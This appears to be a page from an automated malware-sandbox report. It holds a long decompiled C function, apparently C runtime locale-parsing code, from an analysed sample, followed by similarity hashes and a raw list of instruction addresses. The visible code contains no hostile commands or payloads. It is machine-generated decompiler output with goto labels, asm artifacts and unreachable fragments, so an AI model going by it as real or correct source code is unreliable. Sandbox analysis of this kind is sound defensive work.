Associated: 00000001.00000002.259814018.0000000000456000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.259821263.0000000000464000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_wcycejenv.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a5cfeba8171b2151a09221d9dc9c6b483f822aa856f357bdaac384de52c6ca7f
Instruction ID: 401392d9a46b7e37d910dc880bb9b0d01f51bded004d163be470fc5890120b18
Opcode Fuzzy Hash: a5cfeba8171b2151a09221d9dc9c6b483f822aa856f357bdaac384de52c6ca7f
Instruction Fuzzy Hash: EFF08C34601629FBEB11AB50ED0EB9F7E68EF01755F140079F400A22A0CB788E00EA99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A0D5 Relevance: 7.7, APIs: 5, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0042A0D5(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v60;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				short _v454;
				intOrPtr _v456;
				signed int _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v512;
				char _v536;
				intOrPtr _v540;
				signed int _v544;
				intOrPtr _v548;
				signed int _v560;
				char _v708;
				signed int _v712;
				short _v714;
				signed int* _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int* _v732;
				intOrPtr _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v824;
				char _v1252;
				char _v1264;
				intOrPtr _v1276;
				signed int _v1288;
				signed short _v1324;
				void* __ebp;
				signed int _t242;
				void* _t245;
				signed int _t248;
				signed int _t250;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				void* _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				signed int _t271;
				signed int _t278;
				signed int _t279;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t288;
				intOrPtr _t289;
				signed int _t292;
				signed int _t294;
				void* _t295;
				signed int _t301;
				signed int _t302;
				signed int _t304;
				signed int _t305;
				signed int _t323;
				signed int _t325;
				signed int _t327;
				signed int _t332;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int* _t340;
				signed int _t341;
				signed int _t342;
				intOrPtr* _t347;
				signed int _t361;
				signed int _t363;
				void* _t364;
				signed int _t365;
				intOrPtr* _t366;
				signed int _t368;
				void* _t369;
				void* _t373;
				signed int _t377;
				intOrPtr* _t378;
				intOrPtr* _t381;
				void* _t384;
				signed int _t385;
				signed int _t388;
				intOrPtr* _t389;
				signed int _t398;
				intOrPtr _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				signed int _t409;
				signed int* _t415;
				signed int _t416;
				signed int _t425;
				short _t426;
				signed int _t428;
				intOrPtr _t429;
				void* _t430;
				signed int _t432;
				intOrPtr _t433;
				void* _t434;
				signed int _t435;
				signed int _t438;
				intOrPtr _t444;
				signed int _t445;
				void* _t446;
				signed int _t447;
				signed int _t448;
				void* _t450;
				signed int _t452;
				signed int _t454;
				signed int _t457;
				signed int* _t458;
				intOrPtr* _t459;
				short _t460;
				signed int _t462;
				signed int _t463;
				void* _t465;
				void* _t466;
				signed int _t467;
				void* _t468;
				void* _t469;
				signed int _t470;
				void* _t472;
				void* _t473;
				signed int _t485;

				_t424 = __edx;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t361 = E0042E2FC(0x6a6);
				_t241 = 0;
				_pop(_t373);
				if(_t361 == 0) {
					L20:
					return _t241;
				} else {
					_push(__edi);
					_t428 = _t361 + 4;
					 *_t428 = 0;
					 *_t361 = 1;
					_t444 = _a4;
					_t242 = _t444 + 0x30;
					_push( *_t242);
					_v16 = _t242;
					_push(0x44aa08);
					_push( *0x44a944);
					E0042A011(_t361, _t373, __edx, _t428, _t444, _t428, 0x351, 3);
					_t466 = _t465 + 0x18;
					_v8 = 0x44a944;
					while(1) {
						L2:
						_t245 = E00430805(_t428, 0x351, 0x44aa04);
						_t467 = _t466 + 0xc;
						if(_t245 != 0) {
							break;
						} else {
							_t340 = _v16;
							_t415 =  &(_t340[4]);
							_t341 =  *_t340;
							_v16 = _t415;
							_t416 =  *_t415;
							_v20 = _t416;
							goto L4;
						}
						while(1) {
							L4:
							_t424 =  *_t341;
							if(_t424 !=  *_t416) {
								break;
							}
							if(_t424 == 0) {
								L8:
								_t342 = 0;
							} else {
								_t424 =  *((intOrPtr*)(_t341 + 2));
								if(_t424 !=  *((intOrPtr*)(_t416 + 2))) {
									break;
								} else {
									_t341 = _t341 + 4;
									_t416 = _t416 + 4;
									if(_t424 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							_push(_v20);
							_push(0x44aa08);
							asm("sbb eax, eax");
							_v12 = _v12 &  !( ~_t342);
							_t347 = _v8 + 0xc;
							_v8 = _t347;
							_push( *_t347);
							E0042A011(_t361, _t416, _t424, _t428, _t444, _t428, 0x351, 3);
							_t466 = _t467 + 0x18;
							if(_v8 < 0x44a974) {
								goto L2;
							} else {
								if(_v12 != 0) {
									E0042E2C2(_t361);
									_t435 = _t428 | 0xffffffff;
									__eflags =  *(_t444 + 0x28);
									if(__eflags != 0) {
										asm("lock xadd [ecx], eax");
										if(__eflags == 0) {
											E0042E2C2( *(_t444 + 0x28));
										}
									}
									__eflags =  *(_t444 + 0x24);
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										__eflags = _t435 == 1;
										if(_t435 == 1) {
											E0042E2C2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) = 0;
									 *(_t444 + 0x1c) = 0;
									 *(_t444 + 0x28) = 0;
									 *((intOrPtr*)(_t444 + 0x20)) = 0;
									_t241 =  *((intOrPtr*)(_t444 + 0x40));
								} else {
									_t438 = _t428 | 0xffffffff;
									_t485 =  *(_t444 + 0x28);
									if(_t485 != 0) {
										asm("lock xadd [ecx], eax");
										if(_t485 == 0) {
											E0042E2C2( *(_t444 + 0x28));
										}
									}
									if( *(_t444 + 0x24) != 0) {
										asm("lock xadd [eax], edi");
										if(_t438 == 1) {
											E0042E2C2( *(_t444 + 0x24));
										}
									}
									 *(_t444 + 0x24) =  *(_t444 + 0x24) & 0x00000000;
									_t241 = _t361 + 4;
									 *(_t444 + 0x1c) =  *(_t444 + 0x1c) & 0x00000000;
									 *(_t444 + 0x28) = _t361;
									 *((intOrPtr*)(_t444 + 0x20)) = _t241;
								}
								goto L20;
							}
							goto L135;
						}
						asm("sbb eax, eax");
						_t342 = _t341 | 0x00000001;
						__eflags = _t342;
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0042C03B();
					asm("int3");
					_t462 = _t467;
					_t468 = _t467 - 0x1d0;
					_t248 =  *0x454264; // 0x8c4320d5
					_v60 = _t248 ^ _t462;
					_t250 = _v44;
					_push(_t361);
					_push(_t444);
					_t445 = _v40;
					_push(_t428);
					_t429 = _v48;
					_v512 = _t429;
					__eflags = _t250;
					if(_t250 == 0) {
						_v460 = 1;
						_v472 = 0;
						_t363 = 0;
						_v452 = 0;
						__eflags = _t445;
						if(__eflags == 0) {
							L79:
							_t250 = E0042A0D5(_t363, _t424, _t429, _t445, __eflags, _t429);
							goto L80;
						} else {
							__eflags =  *_t445 - 0x4c;
							if( *_t445 != 0x4c) {
								L59:
								_t250 = E004299E7(_t424, _t445,  &_v276, 0x83,  &_v448, 0x55,  &_v468);
								_t469 = _t468 + 0x18;
								__eflags = _t250;
								if(_t250 != 0) {
									_t377 = 0;
									__eflags = 0;
									_t425 = _t429 + 0x20;
									_t447 = 0;
									_v452 = _t425;
									do {
										__eflags = _t447;
										if(_t447 == 0) {
											L74:
											_t256 = _v460;
										} else {
											_t378 =  *_t425;
											_t257 =  &_v276;
											while(1) {
												__eflags =  *_t257 -  *_t378;
												_t429 = _v464;
												if( *_t257 !=  *_t378) {
													break;
												}
												__eflags =  *_t257;
												if( *_t257 == 0) {
													L67:
													_t377 = 0;
													_t258 = 0;
												} else {
													_t426 =  *((intOrPtr*)(_t257 + 2));
													__eflags = _t426 -  *((intOrPtr*)(_t378 + 2));
													_v454 = _t426;
													_t425 = _v452;
													if(_t426 !=  *((intOrPtr*)(_t378 + 2))) {
														break;
													} else {
														_t257 = _t257 + 4;
														_t378 = _t378 + 4;
														__eflags = _v454;
														if(_v454 != 0) {
															continue;
														} else {
															goto L67;
														}
													}
												}
												L69:
												__eflags = _t258;
												if(_t258 == 0) {
													_t363 = _t363 + 1;
													__eflags = _t363;
													goto L74;
												} else {
													_t259 =  &_v276;
													_push(_t259);
													_push(_t447);
													_push(_t429);
													L83();
													_t425 = _v452;
													_t469 = _t469 + 0xc;
													__eflags = _t259;
													if(_t259 == 0) {
														_t377 = 0;
														_t256 = 0;
														_v460 = 0;
													} else {
														_t363 = _t363 + 1;
														_t377 = 0;
														goto L74;
													}
												}
												goto L75;
											}
											asm("sbb eax, eax");
											_t258 = _t257 | 0x00000001;
											_t377 = 0;
											__eflags = 0;
											goto L69;
										}
										L75:
										_t447 = _t447 + 1;
										_t425 = _t425 + 0x10;
										_v452 = _t425;
										__eflags = _t447 - 5;
									} while (_t447 <= 5);
									__eflags = _t256;
									if(__eflags != 0) {
										goto L79;
									} else {
										__eflags = _t363;
										if(__eflags != 0) {
											goto L79;
										} else {
											_t250 = _t377;
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t445 + 2) - 0x43;
								if( *(_t445 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t445 + 4)) - 0x5f;
									if( *((short*)(_t445 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t260 = E00413B12(_t445, 0x44a9fc);
											_t365 = _t260;
											_v468 = _t365;
											_pop(_t380);
											__eflags = _t365;
											if(_t365 == 0) {
												break;
											}
											_t261 = _t260 - _t445;
											__eflags = _t261;
											_v460 = _t261 >> 1;
											if(_t261 == 0) {
												break;
											} else {
												_t263 = 0x3b;
												__eflags =  *_t365 - _t263;
												if( *_t365 == _t263) {
													break;
												} else {
													_t432 = _v460;
													_t366 = 0x44a944;
													_v456 = 1;
													do {
														_t264 = E0042BDB8( *_t366, _t445, _t432);
														_t468 = _t468 + 0xc;
														__eflags = _t264;
														if(_t264 != 0) {
															goto L45;
														} else {
															_t381 =  *_t366;
															_t424 = _t381 + 2;
															do {
																_t337 =  *_t381;
																_t381 = _t381 + 2;
																__eflags = _t337 - _v472;
															} while (_t337 != _v472);
															_t380 = _t381 - _t424 >> 1;
															__eflags = _t432 - _t381 - _t424 >> 1;
															if(_t432 != _t381 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t366 = _t366 + 0xc;
														__eflags = _t366 - 0x44a974;
													} while (_t366 <= 0x44a974);
													_t363 = _v468 + 2;
													_t265 = E00435539(_t380, _t363, 0x44aa04);
													_t429 = _v464;
													_t448 = _t265;
													_pop(_t384);
													__eflags = _t448;
													if(_t448 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t385 = _v452;
															goto L54;
														} else {
															_push(_t448);
															_t268 = E00430A09( &_v276, 0x83, _t363);
															_t470 = _t468 + 0x10;
															__eflags = _t268;
															if(_t268 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E0042C03B();
																asm("int3");
																_push(_t462);
																_t463 = _t470;
																_t271 =  *0x454264; // 0x8c4320d5
																_v560 = _t271 ^ _t463;
																_push(_t363);
																_t368 = _v544;
																_push(_t448);
																_push(_t429);
																_t433 = _v548;
																_v1288 = _t368;
																_v1276 = E0042DA10(_t384, _t424) + 0x278;
																_t278 = E004299E7(_t424, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t472 = _t470 - 0x2e4 + 0x18;
																__eflags = _t278;
																if(_t278 == 0) {
																	L122:
																	_t279 = 0;
																	__eflags = 0;
																	goto L123;
																} else {
																	_t103 = _t368 + 2; // 0x2
																	_t452 = _t103 << 4;
																	__eflags = _t452;
																	_t281 =  &_v280;
																	_v724 = _t452;
																	_t424 =  *(_t452 + _t433);
																	_t388 = _t424;
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t281 -  *_t388;
																		_t454 = _v724;
																		if( *_t281 !=  *_t388) {
																			break;
																		}
																		__eflags =  *_t281;
																		if( *_t281 == 0) {
																			L89:
																			_t282 = _v712;
																		} else {
																			_t460 =  *((intOrPtr*)(_t281 + 2));
																			__eflags = _t460 -  *((intOrPtr*)(_t388 + 2));
																			_v714 = _t460;
																			_t454 = _v724;
																			if(_t460 !=  *((intOrPtr*)(_t388 + 2))) {
																				break;
																			} else {
																				_t281 = _t281 + 4;
																				_t388 = _t388 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t282;
																		if(_t282 != 0) {
																			_t389 =  &_v280;
																			_t424 = _t389 + 2;
																			do {
																				_t283 =  *_t389;
																				_t389 = _t389 + 2;
																				__eflags = _t283 - _v712;
																			} while (_t283 != _v712);
																			_v728 = (_t389 - _t424 >> 1) + 1;
																			_t286 = E0042E2FC(4 + ((_t389 - _t424 >> 1) + 1) * 2);
																			_v740 = _t286;
																			__eflags = _t286;
																			if(_t286 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t454 + _t433));
																				_v748 =  *(_t433 + 0xa0 + _t368 * 4);
																				_v752 =  *(_t433 + 8);
																				_v716 = _t286 + 4;
																				_t288 = E004308DA(_t286 + 4, _v728,  &_v280);
																				_t473 = _t472 + 0xc;
																				__eflags = _t288;
																				if(_t288 != 0) {
																					_t289 = _v736;
																					_push(_t289);
																					_push(_t289);
																					_push(_t289);
																					_push(_t289);
																					_push(_t289);
																					E0042C03B();
																					asm("int3");
																					_push(_t463);
																					_t292 = (_v1324 & 0x0000ffff) - 0x2d;
																					__eflags = _t292;
																					if(_t292 == 0) {
																						L134:
																						__eflags = 0;
																						return 0;
																					} else {
																						_t294 = _t292 - 1;
																						__eflags = _t294;
																						if(_t294 == 0) {
																							_t295 = 2;
																							return _t295;
																						} else {
																							__eflags = _t294 == 0x31;
																							if(_t294 == 0x31) {
																								goto L134;
																							} else {
																								__eflags = 1;
																								return 1;
																							}
																						}
																					}
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t454 + _t433)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t301 = E00429689(_t368, _t433,  &_v708);
																						_t398 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t398 = _v712;
																							_t301 = _t398;
																						}
																					}
																					 *(_t433 + 0xa0 + _t368 * 4) = _t301;
																					__eflags = _t368 - 2;
																					if(_t368 != 2) {
																						__eflags = _t368 - 1;
																						if(_t368 != 1) {
																							__eflags = _t368 - 5;
																							if(_t368 == 5) {
																								 *((intOrPtr*)(_t433 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t433 + 0x10)) = _v720;
																						}
																					} else {
																						_t458 = _v732;
																						_t424 = _t398;
																						_t408 = _t458;
																						 *(_t433 + 8) = _v720;
																						_v716 = _t458;
																						_v728 = _t458[8];
																						_v720 = _t458[9];
																						while(1) {
																							__eflags =  *(_t433 + 8) -  *_t408;
																							if( *(_t433 + 8) ==  *_t408) {
																								break;
																							}
																							_t459 = _v716;
																							_t424 = _t424 + 1;
																							_t332 =  *_t408;
																							 *_t459 = _v728;
																							_v720 = _t408[1];
																							_t408 = _t459 + 8;
																							 *((intOrPtr*)(_t459 + 4)) = _v720;
																							_t368 = _v744;
																							_t458 = _v732;
																							_v728 = _t332;
																							_v716 = _t408;
																							__eflags = _t424 - 5;
																							if(_t424 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t424 - 5;
																							if(__eflags == 0) {
																								_t323 = E00435592(_t424, __eflags, _v712, 1, 0x44a8b8, 0x7f,  &_v536,  *(_t433 + 8), 1);
																								_t473 = _t473 + 0x1c;
																								__eflags = _t323;
																								if(_t323 == 0) {
																									_t409 = _v712;
																								} else {
																									_t325 = _v712;
																									do {
																										 *(_t463 + _t325 * 2 - 0x20c) =  *(_t463 + _t325 * 2 - 0x20c) & 0x000001ff;
																										_t325 = _t325 + 1;
																										__eflags = _t325 - 0x7f;
																									} while (_t325 < 0x7f);
																									_t327 = E00445713( &_v536,  *0x454290, 0xfe);
																									_t473 = _t473 + 0xc;
																									__eflags = _t327;
																									_t409 = 0 | _t327 == 0x00000000;
																								}
																								_t458[1] = _t409;
																								 *_t458 =  *(_t433 + 8);
																							}
																							 *(_t433 + 0x18) = _t458[1];
																							goto L120;
																						}
																						__eflags = _t424;
																						if(_t424 != 0) {
																							 *_t458 =  *(_t458 + _t424 * 8);
																							_t458[1] =  *(_t458 + 4 + _t424 * 8);
																							 *(_t458 + _t424 * 8) = _v728;
																							 *(_t458 + 4 + _t424 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t302 = _t368 * 0xc;
																					_t199 = _t302 + 0x44a940; // 0x428ec9
																					 *0x4492c4(_t433);
																					_t304 =  *((intOrPtr*)( *_t199))();
																					_t401 = _v736;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						__eflags = _t401 - 0x454370;
																						if(_t401 == 0x454370) {
																							L127:
																							_t305 = _v724;
																						} else {
																							_t457 = _t368 + _t368;
																							__eflags = _t457;
																							asm("lock xadd [eax], ecx");
																							if(_t457 != 0) {
																								goto L127;
																							} else {
																								E0042E2C2( *((intOrPtr*)(_t433 + 0x28 + _t457 * 8)));
																								E0042E2C2( *((intOrPtr*)(_t433 + 0x24 + _t457 * 8)));
																								E0042E2C2( *(_t433 + 0xa0 + _t368 * 4));
																								_t305 = _v724;
																								_t404 = _v712;
																								 *(_t305 + _t433) = _t404;
																								 *(_t433 + 0xa0 + _t368 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						_t279 =  *(_t305 + _t433);
																						 *((intOrPtr*)(_t433 + 0x28 + (_t368 + _t368) * 8)) = _t402;
																					} else {
																						 *((intOrPtr*)(_v724 + _t433)) = _t401;
																						E0042E2C2( *(_t433 + 0xa0 + _t368 * 4));
																						 *(_t433 + 0xa0 + _t368 * 4) = _v748;
																						E0042E2C2(_v740);
																						 *(_t433 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t279 = _t424;
																			L123:
																			_pop(_t434);
																			_pop(_t450);
																			__eflags = _v16 ^ _t463;
																			_pop(_t369);
																			return E004085C2(_t279, _t369, _v16 ^ _t463, _t424, _t434, _t450);
																		}
																		goto L135;
																	}
																	asm("sbb eax, eax");
																	_t282 = _t281 | 0x00000001;
																	__eflags = _t282;
																	goto L91;
																}
															} else {
																_t333 = _t448 + _t448;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E004086F2();
																	goto L82;
																} else {
																	 *((short*)(_t462 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v456);
																	_push(_t429);
																	L83();
																	_t385 = _v452;
																	_t468 = _t470 + 0xc;
																	__eflags = _t335;
																	if(_t335 != 0) {
																		_t385 = _t385 + 1;
																		_v452 = _t385;
																	}
																	L54:
																	_t445 = _t363 + _t448 * 2;
																	_t266 =  *_t445 & 0x0000ffff;
																	_t424 = _t266;
																	__eflags = _t266;
																	if(_t266 != 0) {
																		_t445 = _t445 + 2;
																		__eflags = _t445;
																		_t424 =  *_t445 & 0x0000ffff;
																	}
																	__eflags = _t424;
																	if(_t424 != 0) {
																		continue;
																	} else {
																		__eflags = _t385;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t363 - _t336;
														if( *_t363 != _t336) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L135;
										}
										_t250 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t250 =  *(_t429 + (_t250 + 2 + _t250 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t250);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t462;
						_pop(_t364);
						return E004085C2(_t250, _t364, _v12 ^ _t462, _t424, _t430, _t446);
					}
				}
				L135:
			}

0x0042a0d5
0x0042a0dd
0x0042a0de
0x0042a0e7
0x0042a0ef
0x0042a0f1
0x0042a0f3
0x0042a0f6
0x0042a213
0x0042a216
0x0042a0fc
0x0042a0fc
0x0042a0fd
0x0042a100
0x0042a103
0x0042a105
0x0042a108
0x0042a10b
0x0042a10d
0x0042a110
0x0042a115
0x0042a123
0x0042a12d
0x0042a130
0x0042a133
0x0042a133
0x0042a13e
0x0042a143
0x0042a148
0x00000000
0x0042a14e
0x0042a14e
0x0042a151
0x0042a154
0x0042a156
0x0042a159
0x0042a15b
0x0042a15b
0x0042a15b
0x0042a15e
0x0042a15e
0x0042a15e
0x0042a164
0x00000000
0x00000000
0x0042a169
0x0042a180
0x0042a180
0x0042a16b
0x0042a16b
0x0042a173
0x00000000
0x0042a175
0x0042a175
0x0042a178
0x0042a17e
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a17e
0x0042a173
0x0042a189
0x0042a189
0x0042a18e
0x0042a193
0x0042a197
0x0042a1a3
0x0042a1a6
0x0042a1a9
0x0042a1b3
0x0042a1bb
0x0042a1c3
0x00000000
0x0042a1c9
0x0042a1cd
0x0042a218
0x0042a221
0x0042a224
0x0042a226
0x0042a22a
0x0042a22e
0x0042a233
0x0042a238
0x0042a22e
0x0042a23c
0x0042a23e
0x0042a240
0x0042a244
0x0042a245
0x0042a24a
0x0042a24f
0x0042a245
0x0042a252
0x0042a255
0x0042a258
0x0042a25b
0x0042a25e
0x0042a1cf
0x0042a1d2
0x0042a1d5
0x0042a1d7
0x0042a1db
0x0042a1df
0x0042a1e4
0x0042a1e9
0x0042a1df
0x0042a1ef
0x0042a1f1
0x0042a1f6
0x0042a1fb
0x0042a200
0x0042a1f6
0x0042a201
0x0042a205
0x0042a208
0x0042a20c
0x0042a20f
0x0042a20f
0x00000000
0x0042a212
0x00000000
0x0042a1c3
0x0042a184
0x0042a186
0x0042a186
0x00000000
0x0042a186
0x0042a265
0x0042a266
0x0042a267
0x0042a268
0x0042a269
0x0042a26a
0x0042a26f
0x0042a273
0x0042a275
0x0042a27b
0x0042a282
0x0042a285
0x0042a288
0x0042a289
0x0042a28a
0x0042a28d
0x0042a28e
0x0042a291
0x0042a297
0x0042a299
0x0042a2be
0x0042a2c8
0x0042a2ce
0x0042a2d0
0x0042a2d6
0x0042a2d8
0x0042a538
0x0042a539
0x00000000
0x0042a2de
0x0042a2de
0x0042a2e2
0x0042a450
0x0042a46d
0x0042a472
0x0042a475
0x0042a477
0x0042a47d
0x0042a47d
0x0042a47f
0x0042a482
0x0042a484
0x0042a48a
0x0042a48a
0x0042a48c
0x0042a513
0x0042a513
0x0042a492
0x0042a492
0x0042a494
0x0042a49a
0x0042a49d
0x0042a4a0
0x0042a4a6
0x00000000
0x00000000
0x0042a4a8
0x0042a4ac
0x0042a4d5
0x0042a4d5
0x0042a4d7
0x0042a4ae
0x0042a4ae
0x0042a4b2
0x0042a4b6
0x0042a4bd
0x0042a4c3
0x00000000
0x0042a4c5
0x0042a4c5
0x0042a4c8
0x0042a4cb
0x0042a4d3
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a4d3
0x0042a4c3
0x0042a4e2
0x0042a4e2
0x0042a4e4
0x0042a512
0x0042a512
0x00000000
0x0042a4e6
0x0042a4e6
0x0042a4ec
0x0042a4ed
0x0042a4ee
0x0042a4ef
0x0042a4f4
0x0042a4fa
0x0042a4fd
0x0042a4ff
0x0042a506
0x0042a508
0x0042a50a
0x0042a501
0x0042a501
0x0042a502
0x00000000
0x0042a502
0x0042a4ff
0x00000000
0x0042a4e4
0x0042a4db
0x0042a4dd
0x0042a4e0
0x0042a4e0
0x00000000
0x0042a4e0
0x0042a519
0x0042a519
0x0042a51a
0x0042a51d
0x0042a523
0x0042a523
0x0042a52c
0x0042a52e
0x00000000
0x0042a530
0x0042a530
0x0042a532
0x00000000
0x0042a534
0x0042a534
0x0042a534
0x0042a532
0x0042a52e
0x00000000
0x0042a2e8
0x0042a2e8
0x0042a2ed
0x00000000
0x0042a2f3
0x0042a2f3
0x0042a2f8
0x00000000
0x0042a2fe
0x0042a2fe
0x0042a304
0x0042a309
0x0042a30b
0x0042a312
0x0042a313
0x0042a315
0x00000000
0x00000000
0x0042a31b
0x0042a31b
0x0042a31f
0x0042a325
0x00000000
0x0042a32b
0x0042a32d
0x0042a32e
0x0042a331
0x00000000
0x0042a337
0x0042a337
0x0042a33d
0x0042a342
0x0042a34c
0x0042a350
0x0042a355
0x0042a358
0x0042a35a
0x00000000
0x0042a35c
0x0042a35c
0x0042a35e
0x0042a361
0x0042a361
0x0042a364
0x0042a367
0x0042a367
0x0042a372
0x0042a374
0x0042a376
0x00000000
0x00000000
0x0042a376
0x00000000
0x0042a378
0x0042a378
0x0042a37e
0x0042a381
0x0042a381
0x0042a38f
0x0042a398
0x0042a39d
0x0042a3a3
0x0042a3a6
0x0042a3a7
0x0042a3a9
0x0042a3b7
0x0042a3b7
0x0042a3be
0x0042a41f
0x00000000
0x0042a3c0
0x0042a3c0
0x0042a3ce
0x0042a3d3
0x0042a3d6
0x0042a3d8
0x0042a553
0x0042a555
0x0042a556
0x0042a557
0x0042a558
0x0042a559
0x0042a55a
0x0042a55f
0x0042a562
0x0042a563
0x0042a56b
0x0042a572
0x0042a575
0x0042a576
0x0042a579
0x0042a57d
0x0042a57e
0x0042a581
0x0042a591
0x0042a5b4
0x0042a5b9
0x0042a5bc
0x0042a5be
0x0042a896
0x0042a896
0x0042a896
0x00000000
0x0042a5c4
0x0042a5c4
0x0042a5c7
0x0042a5c7
0x0042a5ca
0x0042a5d0
0x0042a5d6
0x0042a5d9
0x0042a5db
0x0042a5de
0x0042a5e5
0x0042a5e8
0x0042a5ee
0x00000000
0x00000000
0x0042a5f0
0x0042a5f4
0x0042a61d
0x0042a61d
0x0042a5f6
0x0042a5f6
0x0042a5fa
0x0042a5fe
0x0042a605
0x0042a60b
0x00000000
0x0042a60d
0x0042a60d
0x0042a610
0x0042a613
0x0042a61b
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a61b
0x0042a60b
0x0042a62a
0x0042a62a
0x0042a62c
0x0042a635
0x0042a63b
0x0042a63e
0x0042a63e
0x0042a641
0x0042a644
0x0042a644
0x0042a654
0x0042a662
0x0042a667
0x0042a66e
0x0042a670
0x00000000
0x0042a676
0x0042a67c
0x0042a689
0x0042a692
0x0042a6a5
0x0042a6ac
0x0042a6b1
0x0042a6b4
0x0042a6b6
0x0042a916
0x0042a91c
0x0042a91d
0x0042a91e
0x0042a91f
0x0042a920
0x0042a921
0x0042a926
0x0042a929
0x0042a930
0x0042a930
0x0042a933
0x0042a949
0x0042a949
0x0042a94c
0x0042a935
0x0042a935
0x0042a935
0x0042a938
0x0042a946
0x0042a948
0x0042a93a
0x0042a93a
0x0042a93d
0x00000000
0x0042a93f
0x0042a941
0x0042a943
0x0042a943
0x0042a93d
0x0042a938
0x0042a6bc
0x0042a6bc
0x0042a6ca
0x0042a6cd
0x0042a6e3
0x0042a6ea
0x0042a6f0
0x0042a6cf
0x0042a6cf
0x0042a6d7
0x00000000
0x0042a6d9
0x0042a6d9
0x0042a6df
0x0042a6df
0x0042a6d7
0x0042a6f6
0x0042a6fd
0x0042a700
0x0042a820
0x0042a823
0x0042a830
0x0042a833
0x0042a83b
0x0042a83b
0x0042a825
0x0042a82b
0x0042a82b
0x0042a706
0x0042a706
0x0042a70c
0x0042a714
0x0042a716
0x0042a719
0x0042a722
0x0042a72b
0x0042a731
0x0042a734
0x0042a736
0x00000000
0x00000000
0x0042a738
0x0042a73e
0x0042a73f
0x0042a74a
0x0042a752
0x0042a75a
0x0042a75d
0x0042a760
0x0042a766
0x0042a76c
0x0042a772
0x0042a778
0x0042a77b
0x00000000
0x00000000
0x0042a77d
0x0042a7a2
0x0042a7a2
0x0042a7a5
0x0042a7c2
0x0042a7c7
0x0042a7ca
0x0042a7cc
0x0042a80a
0x0042a7ce
0x0042a7ce
0x0042a7d4
0x0042a7d9
0x0042a7e1
0x0042a7e2
0x0042a7e2
0x0042a7f9
0x0042a800
0x0042a803
0x0042a805
0x0042a805
0x0042a810
0x0042a816
0x0042a816
0x0042a81b
0x00000000
0x0042a81b
0x0042a77f
0x0042a781
0x0042a786
0x0042a78c
0x0042a795
0x0042a79e
0x0042a79e
0x00000000
0x0042a781
0x0042a83e
0x0042a83e
0x0042a842
0x0042a84a
0x0042a850
0x0042a853
0x0042a859
0x0042a85b
0x0042a8a7
0x0042a8ad
0x0042a8f9
0x0042a8f9
0x0042a8af
0x0042a8b4
0x0042a8b4
0x0042a8ba
0x0042a8be
0x00000000
0x0042a8c0
0x0042a8c4
0x0042a8cd
0x0042a8d9
0x0042a8de
